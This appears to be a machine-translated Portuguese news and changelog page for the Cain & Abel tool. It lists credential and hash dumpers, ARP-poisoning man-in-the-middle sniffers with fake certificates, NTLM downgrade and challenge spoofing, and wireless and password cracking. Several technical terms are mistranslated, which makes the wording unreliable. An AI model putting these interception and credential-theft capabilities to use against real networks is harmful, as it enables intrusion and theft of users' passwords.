Cain & Abel v4.9.56

Cain & Abel v4.9.56 liberado
 Adicionado o Windows Vault senha Decoder.
 Adicionado suporte Windows 8 em LSA secreto Dumper.
 Adicionado suporte Windows 8 no Gerenciador de Credenciais senha Decoder.
 Adicionado suporte Windows 8 em EditBox Revelador.
 Capacidade de manter extensões originais em certificados falsos Adicionado.
 Adicionado suporte para Windows 8 cliente RDP no APR-RDP filtro sniffer.
 Winpcap atualização da biblioteca para a versão 4.1.3 (Windows8 suportado)
 Gerador de certificado adicionado Root na página de configuração do Certificado de falsificação.
 Adicionado experimental recurso Injection Certificado para injetar certificados personalizados para HTTPS / ProxyHTTPS respostas dirigidas aos clientes vítima do APR.
 Adicionado opção Anticache para APR-HTTPS / APR-ProxyHTTPS (touch “If-Modified-Since” campos e “If-None-Match” em cabeçalhos de HTTP do cliente).
 Adicionado opção Anticompress para APR-ProxyHTTPS (campo de toque “Accept-Encoding” em cabeçalhos de HTTP do cliente) APR-HTTPS /.
 Adicionado opção Anticompress para APR-IMAPS (touch “COMPRESS = DEFLATE” campo nas capacidades de servidor).
 Melhoria da velocidade em Collector Certificado.
 Melhoria de velocidade no motor de abril
 Melhoria velocidade todos os filtros farejadores APR-SSL.
 Extração automática acrescentado da Nome comum Assunto (CN) de certificados de servidor para ser usado como nome de host em listas APR-SSL.

 Preservação de Assunto extensão Nome alternativo em certificados falsos.
Nova Base64 diálogo Senha Decoder.
 Biblioteca OpenSSL atualizar para a versão 1.0.1f.
 OUI lista actualizada.
 Vários bugs corrigidos.

Janelas Vault senha Dumper v1.0 liberado.
Esta ferramenta usa funções sem documentos nativos do Windows Vault API para enumerar e extrair credenciais armazenadas pela Microsoft Windows Vault (ex: Internet Explorer 10 senhas).
O código fonte completo está disponível na área de tópicos. Binários estão disponíveis aqui.

Cain & Abel v4.9.43 liberado
 SAP Adicionado filtro R / 3 sniffer para autenticações GUI SAP e SAP DIAG protocolo de descompressão.
 Adicionado suporte para Licenciamento conexões modo Terminal Server para Windows 2008 R2 servidores no APR-RDP filtro sniffer.
 Adicionado suporte para MSCACHEv2 Hashes (usado por Vista / Seven / 2008) no dicionário e ataques de força bruta.
 Adicionado MSCACHEv2 Hashes Cryptanalysis via Tabelas Ordenado do arco-íris.
 Adicionado MSCACHEv2 RainbowTables para WinRTGen v2.6.3.
 MS-CACHE Hashes Dumper agora suporta MSCACHEv2 hashes de extração a partir do Windows Vista / Sete / 2008 máquinas e arquivos de registro off-line.
 Corrigido um bug (falha) no Coletor certificado com as configurações de proxy habilitado.

Cain & Abel v4.9.40 liberado
 Adicionado suporte proxy para Collector Certificado de Caim.
 Adicionado a capacidade de especificar as credenciais de autenticação de proxy personalizados para Collector Certificado.
 Adicionado ProxyHTTPS Man-in-the-Middle Sniffer (porta TCP 8080).
 HTTP, APR-HTTPS e filtros farejadores APR-ProxyHTTPS agora estão separados.
 Indicador de barra de progresso Adicionado na função de arquivo de captura off-line.
 Bug corrigido na ProxyHTTPS Man-in-the-Middle Sniffer análise “Conexão estabelecida” string.
 Bug corrigido em VoIP Sniffer criação de arquivos MP3 mono.
 Corrigido o erro no processamento Sniffer arquivos de captura off-line RTP.
 WinRTGen recompilados com versão da biblioteca OpenSSL 0.9.8q.
 Biblioteca OpenSSL atualizar para a versão 0.9.8q.
 Winpcap atualização da biblioteca para a versão 4.1.2.

Cain & Abel v4.9.38 liberado
– Adicionado TCP / UDP Large Send desembarque de detecção de status no Windows Vista / Seven.
 Melhor manipulação de segmentos APR-SSL MITM.
 Corrigido um problema com a APR em Windows7 causando máquina do atacante a ser isolado a partir de hosts envenenadas.
 Melhoria da velocidade em Credencial Decoder Password Manager para sistemas operacionais x64.
 Corrigido um erro de execução de Caim quando o filtro sniffer SIP / RTP está desativado.
 SIP, MGCP e RTP filtros farejadores estão agora separados.
 Corrigido RTP filtro sniffer para evitar o tráfego processamento de link-local Multicast Nome Resolução (LLMNR) na porta UDP 5355.
 Corrigido RTP filtro sniffer para evitar o processamento de tráfego SSDP na porta UDP 1900.
 Corrigido RTP filtro sniffer para evitar o processamento de tráfego Multicast DNS (MDC) na porta UDP 5353.
 Melhoria da função de validação do protocolo RTP.

Cain & Abel v4.9.36 liberado
 Adicionado MP3 geração de arquivo de áudio em VoIP sniffer.
 Corrigido Abel DLL falhas em sistemas operacionais de 64 bits.
 Função de Exportação Modificado para usuários, grupos, Serviços e Ações listas com separadores de tabulação.
 Corrigido um bug no Wireless senha Decoder relativa Microsoft Virtual WiFi Miniport Adapter.
 Corrigido um bug no NTLMv2 Cracker dentro da função “Test senha”.
 Removido “WindowsFirewallInitialize falhou” mensagem de erro de inicialização se o serviço Firewall do Windows está parado.

Cain & Abel v4.9.35 liberado
 Adicionado suporte para Windows 2008 Terminal Server no APR-RDP filtro sniffer.
 Adicionado Abel64.exe e Abel64.dll para apoiar hashes extração em sistemas operacionais x64.
 X64 suporte sistemas operacionais Adicionado em NTLM hashes Dumper, MS-CACHE hashes Dumper, LSA Secrets Dumper, Decoder Senha sem fio, Gerenciador de Credenciais senha Decoder, DialUp senha Decoder.
– Adicionado o Windows Live Mail (Windows 7) Decoder senha para contas POP3, IMAP, NNTP, SMTP e LDAP.
– Corrigido um erro da RSA SecurID Calculadora na função de importação XML.
– Corrigido um bug em todos os filtros farejadores base APR-SSL para evitar 100% de utilização da CPU durante a transmissão dos dados.
– executáveis reconstruídas com o Visual Studio 2008.
– Detecção de estado Adicionado Firewall do Windows na inicialização.
– Adicionado compatibilidade UAC no Windows Vista / Seven.
– Winpcap atualização da biblioteca para a versão 4.1.1.

Cain & Abel v4.9.31 liberado
– SIPS Man-in-the-Middle Sniffer (porta TCP 5061; testado com sucesso com o Microsoft Office Communicator com certificados encadeado).
– Adicionado suporte para RTP G726-64WB codec (Wengo substituição speex) em VoIP sniffer.
– Extensões do certificado X509 estão agora preservados em certificados falsos acorrentados gerados pelo coletor de certificados.
– Caracteres ASCII suporte estendido para o SSID no passivo sem fio Scanner.
– Alguns bugs em Traceroute de Caim fixo.

Cain & Abel v4.9.30 liberado
– Adicionado suporte para os seguintes codecs de VoIP sniffer: G722, Speex-16kHz, Speex-32 Khz, AMR-NB, AMR-WB.
– Capacidade Collector Adicionado Certificate para gerar certificados falsos auto-assinados ou acorrentado.
– Função de conversão de formato de certificado Adicionado (de PKCS # 12 a PEM).
– Adicionado suporte para Licenciamento conexões Modo Terminal Server no APR-RDP filtro sniffer.
– Canal Adicionado pulando capacidade nos canais A, BG e ABG em passiva sem fio Sniffer.
– Adicionado suporte para uma canais em passiva sem fio Sniffer.
– Detecção automática de canais Adicionado RX / TX ABG para adaptadores AirPcap NX.
– WEP ARP segmento Injection agora evitar o envio de pacotes para estações dissociados.
– AirPcap atualização da biblioteca para a versão 4.0.0 (para suportar os novos adaptadores AirPcap NX do CACE Technologies).
– Winpcap atualização da biblioteca para a versão 4.1 beta 5.
– Biblioteca OpenSSL atualizar para a versão 0.9.8j.

Cain & Abel v4.9.25 liberado
– Oracle 11g (case sensitive) Senha Extractor via ODBC.
– Adicionado Oracle 11g Bolacha de Senha (ataques de dicionário e força bruta).
– Adicionado suporte para Oracle TNS 11g (AES-192) no Oracle TNS hashes de senha Cracker.
– Adicionado suporte para Oracle TNS 11g (AES-192) no Oracle TNS filtro sniffer.
– Ferramenta experimental de consultas SQL via ODBC.
– Corrigido um estouro de buffer no Decoder desktop Remote Password.

Meu papel sobre a Oracle TNS 11g de autenticação (AES-192) foi adicionado na área de tópicos.

Cain & Abel v4.9.23 liberado
– Suporte codec Adicionado LRWB-16kHz em VoIP sniffer.
– Adicionado MGCP / RTP filtro sniffer. Cain agora pode extrair parâmetros SDP-RTP de protocolo MGCP.
– Corrigido alguns bugs no SIP / RTP filtro sniffer causando falhas enquanto sniffing.
– Funções DLL injeção de todo o dumper foram reescritos para usar diretamente sem documentos API ZwCreateThread vez de CreateRemoteThread. No XP / 2003, Cain agora suporta extração de senhas / hashes / segredos, mesmo se executados em sessões do Terminal Server.
– Corrigido um bug no ataque opção dicionário “Double”.

Cain & Abel v4.9.21 liberado
– Adicionado PPPoE filtro sniffer para PAP, CHAP, MS-CHAPv1 e MS-CHAPv2 autenticações.
– Adicionado GRE / PPP filtro sniffer para autenticações MS-CHAPv2.
– Tradução automática acrescentado da MS-CHAPv2 a NT-challanges na função “Enviar para Cracker”.
– Adicionado suporte para o Remote Desktop v6 cliente no APR-RDP sniffer.
– Adicionado suporte para Oracle TNS 10g (AES-128) no Oracle TNS hashes de senha Cracker.
– Adicionado suporte para Oracle TNS 10g (AES-128) no Oracle TNS filtro sniffer.
– Colunas Adicionado UserField e Passfield em lista sniffer HTTP.
– Adicionado uma coluna “Nota” em todas as listas de biscoito.
– Corrigido um bug no off-line hashes NTLM dumper quando o parâmetro BootKey não é especificado.
– Corrigido um bug no off-line hashes NTLM dumper quando LM hash não está presente.
– Arquivo de Charset atualizado para suportar alemão uma dinamarqueses caracteres especiais em rainbowtables (por Caim e Winrtgen).

Eu só quero compartilhar resultados da minha pesquisa no Oracle TNS (9i 3DES) e (10 g AES-128) autenticação. Os trabalhos podem ser encontrados na área de tópicos.

Cain & Abel v4.9.15 liberado
– Adicionado a Oracle TNS Password Cracker (dicionário e ataques de força bruta para DES e 3DES hashes).
– Adicionado a Oracle TNS filtro sniffer para DES e 3DES autenticações.
– Corrigido um erro na VNC filtro sniffer para novas versões de protocolo RFB.
– Corrigido um bug com TCP / UDP / ICMP traceroute e Windows código de erro socket raw 10022.
– Corrigido um erro na RSA SecurID Calculadora para keyfobs com números de série de mais de 8 dígitos.
– Corrigido um erro na bolachas dicionário ataque sobre híbrido misto e variantes Caso permutações.
– Corrigido um erro na falsificação de desafio e desclassificação NTLM quando um dos anfitriões vítima é um gateway.
– Biblioteca OpenSSL atualizar para a versão 0.9.8h.

Cain & Abel v4.9.14 liberado
– Adicionado GRE / PPP filtro sniffer para PAP, CHAP e autenticações MS-CHAPv1 (LM e NTLM).
– Adicionado CHAP-MD5 (dicionário e ataques de força bruta).
– Análise sniffer Acrescentado em GRE / PPP incapsulated tráfego; compressão MPPC ainda não são suportados.

Cain & Abel v4.9.12 liberado
Novas características:
– Adicionado compatibilidade do Windows Vista em todas as sniffers APR-SSL.
– Adicionado suporte para formato de arquivo IVs do novo Aircrack-ng no WEP IVs sniffer e cracker.
– Modificado caractere separador no biscoito arquivos LST de farejadores de e “;” com “TAB”.

ATENÇÃO !!! O formato de arquivo de lista de senha é alterada e arquivos antigos LST não são mais compatíveis. Sugere-se fortemente para backup de seus arquivos antes de atualizar para esta nova versão.

Cain & Abel v4.9.10 liberado
Novas características:
– Adicionado o Editor do Registro remoto.
– Adicionado SIREN codec apoio VoIP sniffer (o padrão usado pelo Windows Messenger).
– Adicionado suporte para novas Keyfobs AES-128 bits no RSA SecurID token Calculator.
– Microsoft SQL Server 2005 senha Extractor via ODBC.
– Corrigido um bug no decodificador senha de Internet Explorer 7 Conclusão automática.
– Usuários HTTP padrão e campos de senhas atualizado.
– O reconhecimento automático de capacidade AirPcap TX baseado em canais.
– AirPcap atualização da biblioteca para a versão 3.2.
– Winpcap atualização da biblioteca para a versão 4.0.2.

O casamento de Mao para Roberta.

Cain & Abel v4.9.6 liberado
Novas características:
– Adicionado suporte Windows Vista no LSA Secrets dumper para arquivos de registro externas.
– Corrigido um erro na LSA Secrets Dumper causando falhas de aplicação.
– Corrigido um bug no NT hashes dumper para arquivos de seção quando apenas hashes NT estão presentes.
– Winpcap atualização da biblioteca para a versão 4.0.1.
– Adicionado suporte para o Windows Vista Scanner sem fio ativa.
– Off-line captura de processamento de arquivos agora compatível com 802.1Q encapsulamento.
– Filtro Sniffer para senhas LDAP.
– Coletor Automático Certificado para o protocolo LDAPS.
– LDAPS Man-in-the-Middle Sniffer e colecionador senha (porta TCP 636).

Algumas imagens do computador de Farrell no filme Die Hard 4 … dar uma olhada sobre o diabo vermelho aqui e aqui.

Cain & Abel v4.9.4 liberado
Novas características:
– Coletor automático de certificados para FTPS (implícito), protocolos IMAPS e POP3S.
– FTPS Man-in-the-Middle Sniffer e colecionador de senha.
– POP3S Man-in-the-Middle Sniffer e colecionador de senha.
– IMAPS Man-in-the-Middle Sniffer e colecionador de senha.
– Adicionado o Windows Mail (Vista) Password Decoder para contas POP3, IMAP, NNTP, SMTP e LDAP.
– Adicionado PTW WEP cracking.
– Adicionado suporte Windows Vista Senha Decoder sem fio.
– Sem fio senha Decoder agora usa injeção de DLL no XP.

Cain & Abel v4.9.1 liberado
Novas características:
– Adicionado suporte Windows Vista no NT hashes Dumper.
– Adicionado suporte Windows Vista no LSA Secrets dumper.
– Adicionado suporte Windows Vista no Gerenciador de Credenciais senha Decoder.
– Adicionado suporte Windows Vista no DialUp senha Decoder.
– Adicionado suporte Windows Vista em todas as funções DLL injeção.
– Adicionado suporte para o Internet Explorer senhas 7 preenchimento automático.
– Adicionado suporte para o Outlook Express contas excluídas no armazenamento protegido Password Manager.
– WPA-PSK (dicionário e ataques de força bruta).
– WPA-PSK Auth (dicionário e ataques de força bruta).
– WPA-PSK Authentications sniffer.
– WPA-PSK Hashes Cryptanalysis via Tabelas Ordenado do arco-íris.
– WPA-PSK RainbowTables foram adicionados ao Winrtgen v2.5.
– Adicionado senhas IE7 apoiar no Gerenciador de Credenciais senha Decoder.
– Biblioteca OpenSSL atualizar para a versão 0.9.8e.

CACE Technologies me pediu para remover o AIRPCAP motoristas v2.0 beta TX do meu site, então você não pode baixá-lo mais de oxid.it. Aquele motorista foi destinado apenas para teste …. um novo driver AIRPCAP com capacidades TX é esperado para estar disponível em seu site no futuro.

Cain & Abel v4.5 liberado
Novas características:
– Quebra WEP acelerar via ARP wireless solicita injecção (adaptador USB AirPcap é necessária).
Este recurso foi testado com sucesso com os motoristas AIRPCAP v2.0 beta TX.
– Capacidade de deauthenticate estações de cliente a partir de pontos de acesso.
– Adicionado compatibilidade do Windows Vista em NTLM hashes Dumper, LSA Hashes Dumper e Syskey Dumper para arquivos de seção.

Cain & Abel v4.3 liberado
Novas características:
– De Caim MITM NTLM Desafio Spoofing. (Requer abril para ser ativo e uma condição MITM entre hosts vítima).
Você pode desafios Server agora paródia em autenticações NTLM; este recurso permite o uso de RainbowTables para quebrar hashes de rede.
ATENÇÃO !!! Permitindo que os usuários causam Desafio Spoofing a falhar autenticações para usá-lo com cuidado.
– autenticações NTLM sessão de segurança downgrade para LM & NTLMv1. Os seguintes protocolos são suportados: SMB, DCE / RPC, TDS, HTTP, POP3, IMAP, SMTP.
– LM + desafio falsificado Hashes Cryptanalysis via Tabelas Ordenado do arco-íris.
– HALFLM + desafio falsificado Hashes Cryptanalysis via Tabelas Ordenado do arco-íris.
– NTLM + desafio falsificado Hashes Cryptanalysis via Tabelas Ordenado do arco-íris.
– Novos tipos de RainbowTables foram adicionados ao Winrtgen v2.4.
“Lmchall” e tabelas “ntlmchall” pode ser usado contra LM e NTLM hashes de resposta para os desafios falsificados (padrão: 0x1122334455667788).
mesas “halflmchall” pode ser usado contra os primeiros 8 bytes hashes LM resposta para os desafios falsificados para recuperar os 7 primeiros caracteres da senha original.
– Adicionado HALFLMCHALL hashes submissão a rainbowcrack-online cliente.
– Capacidade para despejar Secrets LSA diretamente de arquivos seção do sistema e registro de segurança.
Um grande obrigado a todos os usuários do fórum oxid.it para o excelente suporte.

Mao na Hackcon conferência de segurança # 2 (fevereiro 7/8 – OSLO, Noruega)
Pediram-me para estar lá como um alto-falante para apresentar os mais recentes recursos de meu programa Cain & Abel.
Informação detalhada em http://www.hackcon.org.

Eu notei que Cain & Abel características VoIP são demonstradas no livro Hacking Exposed Voip por David Endler e Mark Collier.

Cain & Abel v3.9 liberado
Novas características:
– RainbowTables apoio da Adicionado Ophcrack para o ataque NTLM hashes Cryptanalysis.
– Capacidade para despejar MSCACHE hashes diretamente de arquivos seção do sistema de registo e segurança.
– MSCACHE Hashes Cryptanalysis via Tabelas Ordenado do arco-íris.
– ORACLE Hashes Cryptanalysis via Tabelas Ordenado do arco-íris.
– Tipos de New rainbow table foram adicionados ao Winrtgen v2.0. “Mscache” e tabelas “oracle” pode ser usado contra MSCACHE e ORACLE hashes nomes de usuários específicos que podem ser definidas na janela de configuração.

IRS v2.0 e v1.7 lançado sTerm
Novas características:
– Winpcap atualização da biblioteca para a versão beta2 4.0.

Cain & Abel v3.3 liberado
Novas características:
– Suporte para AirPcap adaptador USB 2.0 no Wireless Scanner.
– Scanner passivo sem fio com canal de salto apoio.
– AirpCap.DLL ligados dinamicamente.
– IVs WEP sniffer (arquivos de captura são compatíveis com arquivos .ivs de AirCrack).
– 802,11 arquivos de captura analisador compatível com PCAP e formatos de arquivo .ivs de AirCrack.
– Decodificador de arquivos de captura 802.11 (suporte criptografia WEP e WPA-PSK).
– WPA-PSK pré-compartilhada calculadora chave.
– WEP Cracker usando Ataque do Korek (64-bit e comprimento de chave de 128 bits suportado).
– Off-line de processamento de arquivo de captura agora compatível com extensões sem fio.
– Adicionado suporte codec G722.1 no sniffer VoIP.
– Adicionado filtro de sniffer para autenticações DCE / RPC (Outlook conectando ao servidor Exchange).
– Adicionado suporte para Winpcap biblioteca versão 4.0 e superior.
– Adicionado uma opção para desativar o modo promíscuo da placa de rede.
– Corrigido um problema com comprimentos Bugus no cabeçalho UDP para evitar acidentes farejadores.
– Corrigido um problema no hashes MS-CACHE dumper.
– Corrigido um erro de alocação de memória no ataque criptoanálise via RainbowTables em sistemas com 2 GB de RAM ou mais.
– Biblioteca OpenSSL atualizar para a versão 0.9.8d.
– Winpcap atualização da biblioteca para a versão beta2 4.0.

forum oxid.it Experimental é online.

Acabei de receber um adaptador USB AirPcap da CACE Technologies (graças Loris). Esta maravilhosa peça de hardware permite a captura de quadros 802.11 no Windows por meio do driver AirPcap, é altamente recomendado para solucionar problemas de redes sem fio. O adaptador será apoiado na próxima versão do Cain & Abel, fique atento.

Cain para PocketPC (ARM) v1.3 liberado. Faça o download aqui.
Novas características:
– Pocket Outlook senha Decoder.

resultados incríveis para Cain & Abel em Insecure.Org pesquisa de 2006

9º classificado na lista completa – Top 100 Ferramentas de segurança de rede
Classificação 4 na categoria “Packet sniffers” – Top 11 sniffers
1º Classificado na categoria de “crackers de senhas” – Top 10 Crackers senha

Graças a todos os profissionais de segurança que votaram para o programa. Eu também gostaria de dizer um grande obrigado a todos os usuários e testadores beta para a ajuda dada, doações, sugestões de melhoria, relatórios de bugs, eo grande apoio.
obrigado novamente,
Massimiliano Montoro.

Cain & Abel v2.9 liberado
Novas características:
– RainbowTables de Adicionado ophcrack apoio para o ataque LM hashes Cryptanalysis.
– Adicionado hashes funções de sincronização de (exportação / importação) de / para Cain para PocketPC via ActiveSync.
– Suporte sniffer Adicionado VoIP para os seguintes codecs: G723.1, G726-16, G726-24, G726-32, G726-40, LPC-10.
– Adicionado suporte para Winpcap v3.2.

Li recentemente um artigo do Washington Post que mostra uma imagem do presidente dos EUA, George W. Bush visitar a sede da Agência de Segurança Nacional (NSA) em janeiro de 2006. Cain & Abel está lá, exibido no Radar Talisker no fundo. Apesar I não estou preocupado com NSA acompanhamento do desenvolvimento do programa (eles são bem-vindos), eu acho que eles estão realmente faltando um monte de recursos, pois a versão na tela não é atualizado.

Cain para PocketPC (ARM) v1.2 liberado. Faça o download aqui.
requisitos:
– PocketPC dispositivo de 2003 com uma arquitetura de microprocessador ARM base (por exemplo: ipaq6515, Qtek 2020 Qtek 9090 ….).
– Microsoft Windows CE ou o sistema operacional Windows Mobile.
– 5 MB de memória livre
Características:
– Cliente Rainbowcrack-online (funciona com qualquer conexão de Internet disponíveis, tais como GPRS, ActiveSync ….).
– ataques de dicionário para os seguintes tipos de hash: MD2, MD4, MD5, SHA1, RIPEMD160, CiscoPIX, MySQL v3.23, MySQL v3.23 + challange, MySQL SHA1, MySQL SHA1 + challange, LM, LM + challange, NTLM NTLM + desafio, NTLM sessão de segurança.
– Calculadora Hash.
– Base64 senha Decoder.
– Cisco Type-7 senha Decoder.
– Cisco VPN Senha de Cliente Decoder.
– VNC senha Decoder.
– Microsoft Messenger Password Decoder.
– Internet Explorer Password Decoder.
– ActiveSync senha Decoder.
Sua ajuda é necessária para a recuperação de senhas do Pocket Outlook! Eles provavelmente são armazenadas no banco de dados “pmailFolders” sob a forma de BLOBS segurança. Se você encontrar detalhes sobre a maneira correta de decifrá-los, por favor, enviá-las para mim e eu vou atualizar Cain o mais rapidamente possível.

Cain & Abel v2.8.4 liberado
Novas características:
– Cliente Rainbowcrack-Online.
O cliente foi desenvolvido em colaboração com a equipe Rainbowcrack-Online. Cain agora pode interagir com o poder excepcional deste serviço de cracking on-line baseado na tecnologia rainbow table. O serviço não é gratuito e você precisa de uma conta válida para usar este recurso, por favor, verifique as taxas atuais em seu site. A comunicação entre Caim e o site é SSL habilitado para garantir a privacidade das informações transmitidas.
– Oracle Password Cracker (dicionário e ataques de força bruta).
– Oracle Senha Extractor via ODBC.
– MySQL Senha Extractor via ODBC.
– Manual do Programa actualizado.

Conferência Internacional de Tóquio Security 2005
SIDC KK e M Fábrica Corporation do Japão entraram em um acordo para sediar e patrocinar a primeira Conferência anual Tokyo International Segurança (Tokyo INTERSEC) a ser realizada em 17 de novembro e 18.
Pediram-me para estar lá como um alto-falante para apresentar o mais recente lançamento do meu programa Cain & Abel.

Cain & Abel v2.8 liberado
Novas características:
– Cisco VPN Senha de Cliente Decoder.
– Syskey Decoder. Cain agora pode extrair a chave de inicialização, gerado com o utilitário Syskey, a partir do sistema local ou arquivos de registro do sistema externas.
– NT hashes Dumper agora pode extrair os hashes de senha de “off-line” SAM arquivos criptografados com o utilitário Syskey.
– Configuração zero sem fio senha Dumper.
– RDPv4 sniffer sessão para abril
Cain pode agora realizar ataques man-in-the-middle contra a pesada criptografado Remote Desktop Protocol (RDP), o utilizado para se conectar ao serviço de servidor de terminal de um computador Windows remoto. A sessão inteira de / para o cliente / servidor é descriptografado e salvos em um arquivo de texto. cursos chaves do lado do cliente também são decodificados para fornecer algum tipo de intercepção senha. O ataque pode ser completamente invisível, devido à utilização de abril (Encaminhamento veneno ARP) e outra fraqueza protocolo.
– Winrtgen v1.8 adicionado ao pacote de instalação. (Tabelas fastlm gerado com uma versão anterior a 1.7 poderia ter problemas, por favor atualize)
– Corrigido um problema na LSA Secrets Dumper causando falhas em sistemas com DEP ativado. Graças a Nicolas RUFF para o relatório de bug.
– Corrigido um problema com caracteres ASCII estendidos no ataque Cryptanalysis. Graças a Ramius de rainbowtables.net para o relatório de bug.
– Bug corrigido em função de verificação da tabela de arco-íris. Graças a todos os beta testers para os relatórios de bugs.
– Corrigido o erro no algoritmo de rainbow table fastlm.
– Biblioteca OpenSSL atualizar para a versão 0.9.8a.

28/05/2005 – aniversário de mao
Security Advisory: Remote Desktop Protocol, o bom, o mau eo feio. Verifique a área de tópicos para obter detalhes.

2005/07/05
Cain & Abel v2.69 lançado
Novas características:
– Um novo tipo de tabelas de arco-íris foi adicionado à Winrtgen v1.3. “FastLM” tabelas podem ser usadas contra hashes LM e fornecer tanto a geração e criptoanálise mais rápido. mesas FastLM não são compatíveis com tabelas padrão para LM hashes gerados por RainbowCrack, renomeando os nomes dos arquivos é inútil.
– LM hashes Cryptanalysis via Tabelas FastLM Ordenado do arco-íris.
– Referência adicionado ao diálogo criptoanálise de Caim.
– Corrigido dois erros em Kerberos5 e SNMP filtros farejadores (graças para os relatórios de bugs).
– MSCACHE Hashes Dumper
– MSCACHE Hashes dicionário e força bruta Crackers
– Filtro Sniffer para autenticações SIP-MD5
– SIP-hashes MD5 dicionário e força bruta Crackers
– Off-line de processamento de arquivo de captura compatível com winpcap, tcpdump, formato etéreo.

20/03/2005
Cain & Abel v2.67 lançado
duas condições de estouro de buffer fixos em filtros farejadores HTTP IKE-PSK e. Muito obrigado a Gary Oleary-Steele e Rafael ^^ Mag ^^ Kwasny para os relatórios de bugs. Também fixa vários bugs heap overflow no POP3, SMTP, IMAP, NNTP e TDS filtros farejadores.

26/02/2005
Cain & Abel v2.65 lançado
Novas características:
– VoIP sniffer / gravador
sniffer de Cain agora pode extrair conversas de áudio com base em SIP protocolos / RTP e salvá-los em arquivos WAV. Os seguintes codecs são suportados: G711 uLaw, G711 aLaw, GSM, MS-GSM, ADPCM, DVI, LPC, L16, G729, Speex, iLBC. Este recurso é experimental, deixe-me saber seus resultados.

15/12/2004
Cain & Abel v2.5 liberado
Finalmente, lançamento da versão 2.5 está fora. Isso não significa que o programa está agora livre de erros ou que não há mais nada a fazer dentro dele, no entanto após a versão beta 65 Penso que é chegado o momento para um lançamento. Eu passei um tempo considerável a trabalhar neste programa e sua documentação, mas as coisas podem mudar no futuro ….. Você pode agora ajudar a oxid.it continuar a desenvolver software fazendo doações freeware para minha conta PayPal. O dinheiro que eu receber este caminho vai para os meus web hosting taxas em curso e outros custos que incorrem, fazendo os programas neste site disponível para você gratuitamente.

10/12/2004
Winrtgen v1.2 (Gerador de Tabelas do arco-íris), divulgado
– Geração de tabela Adicionado para-2 SHA (512) hashes SHA-2 (256), SHA-2, (384) e
– Apoio charset costume Adicionado

01/12/2004
Cain & Abel beta65 v2.5 para NT / 2000 / XP lançado (esta é provavelmente a última versão beta, Cain & Abel manual v2.5 Usuário estará disponível logo que possível)
Novas características:
– Credencial Decoder Password Manager para Windows XP / 2003
Gerenciador de Credenciais é uma nova solução de SSO que a Microsoft oferece no Windows Server 2003 e Windows XP. Cain agora pode despejar senhas de arquivos de credenciais do usuário e mostrá-los em eles são forma de texto claro. Eu também preparou uma versão de linha de comando deste recurso chamado creddump. Todo o código fonte para o Visual C ++ está incluído.
– Brute-Force e ataques de dicionário para SHA-2 (256), SHA-2 (384), SHA-2 (512) Hashes
– SHA-2 (256), SHA-2 (384), SHA-2 (512) Hashes Cryptanalysis via Tabelas Ordenado do arco-íris
– TCP Traceroute agora usa Winpcap para contornar as novas restrições no Windows XP SP2 em soquetes brutos
– Suporte para senhas ASCII estendidos em LM e NTLM biscoitos
– Filtro Sniffer para cordas comunitários SNMP
– Capacidade de inserir / modificar as portas de protocolo de farejadores TCP / UDP
– Capacidade para inserir / alterar o nome de usuário e senha campos utilizados pelos HTTP Sniffer Filtro
– Capacidade de selecionar nomes de DNS ativos para falsificar no APR-DNS
– Decodificadores senha para MSN Explorer Entrar, MSN Explorer Autocomplete, Outlook Express Identity Manager, Outlook Express (HTTP Mail) e Outlook (IMAP, POP3, …) em Armazenamento protegido Password Manager
– Suporte para o Outlook Express identidade múltipla no armazenamento protegido Password Manager
– Adicionado Hashes do tipo SHA-2 (256), SHA-2 (384), SHA-2 (512) na Calculadora Hash
– Função de exportação em Dialup Password Decoder
– Biblioteca Winpcap atualizado para a versão 3.1 beta4

26/09/2004
Cain & Abel beta59 v2.5 para NT / 2000 / XP lançado
– Adicionado senha História Hashes no Hash Dumper
– Adicionado Abel lado senha História Hashes Dumper
– Alguns bugs corrigidos e limpeza de código em Hash Dumper
– Bug corrigido na LSA secreto Dumper com WindowsXP Service Pack 2

26/06/2004
Ajuda necessária para WEP rachaduras nas janelas!
Eu escrevi um programa de exemplo rápido e sujo para controlar as placas baseadas Prism2 usando o driver de protocolo Winpcap ea API PacketRequest. Quebra WEP requer a captura de quadros 802.11; Este programa mostra como definir esses cards em HostAP e modo monitor e contém funções para obter / definir parâmetros do chipset Prism2. Todo o código fonte para o Visual C ++ está incluído, espero que você possa me ajudar em alguns temas e problemas que eu encontrei. O código deve compilar sem problemas, mas para testar o programa você precisa de um cartão com base Prism2 eo motorista Winpcap instalado.
Você pode baixar Prisma aqui.

23/06/2004
Winrtgen v1.1 (Gerador de Tabelas do arco-íris), divulgado
Alguns de vocês pediu uma versão gráfica do rtgen e rtsort de RainbowCrack v1.2. Winrtgen gera tabelas do arco-íris para LM, NTLM, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHA1 e CiscoPIX hashes. Você pode encontrar Winrtgen na área de projetos.
Para mais detalhes sobre a geração de tabelas, consulte o site da RainbowCrack.

14/06/2004
Cain & Abel beta56 v2.5 para NT / 2000 / XP lançado
Novas características:
– Scanner sem fio
O scanner usa o driver de protocolo Winpcap assim que deve funcionar no Windows 2000 e Windows XP. Eu realmente não sei quantos cartões são suportados, a tabela de compatibilidade está aqui. Por favor, deixe-me saber seus resultados.
– Biblioteca Winpcap atualizado para a versão 3.1 beta3

14/05/2004
Cain & Abel beta51 v2.5 para NT / 2000 / XP lançado
Novas características:
– MySQL Hashes Cryptanalysis via Tabelas Ordenado do arco-íris
– Cisco PIX Hashes Cryptanalysis via Tabelas Ordenado do arco-íris
(Eu também preparou um patch para RainbowCrack v1.2 para apoiar essas tabelas)
– Cracker senha MySQL (funciona tanto com v3.23 e SHA1 hashes)
– Filtro Sniffer para autenticações MySQL (v3.23 e SHA1)
– Brute-Force e ataques de dicionário reescritos para todos os biscoitos
– Biblioteca OpenSSL atualizado para a versão 0.9.7d
– Biblioteca Winpcap atualizado para a versão 3.1 beta2
– Bug e limpeza de código
(Um agradecimento especial a SgarS para o algoritmo de busca binária rápido assembler)

01/02/2004
Cain & Abel na TechTV
O programa foi apresentado por “The Screen Savers”. Detalhes e vídeo aqui.

2004/10/01
Cain & Abel beta47 v2.5 para NT / 2000 / XP lançado
Novas características:
– NTLM, MD2, MD4, MD5, SHA1 e RIPEMD160 Hashes criptoanálise via Tabelas Ordenado do arco-íris
– Compatibilidade com v1.2 RainbowCrack
– Dialup Password Decoder
– Microsoft SQL Server Cracker 2000 senha
– Microsoft SQL Server 2000 senha Extractor via ODBC
– Enterprise Manager senha Decoder (SQL Server 7.0 e SQL Server 2000 suportado)
– Remote Desktop senha Decoder (senhas decodificar arquivos em .RPD)
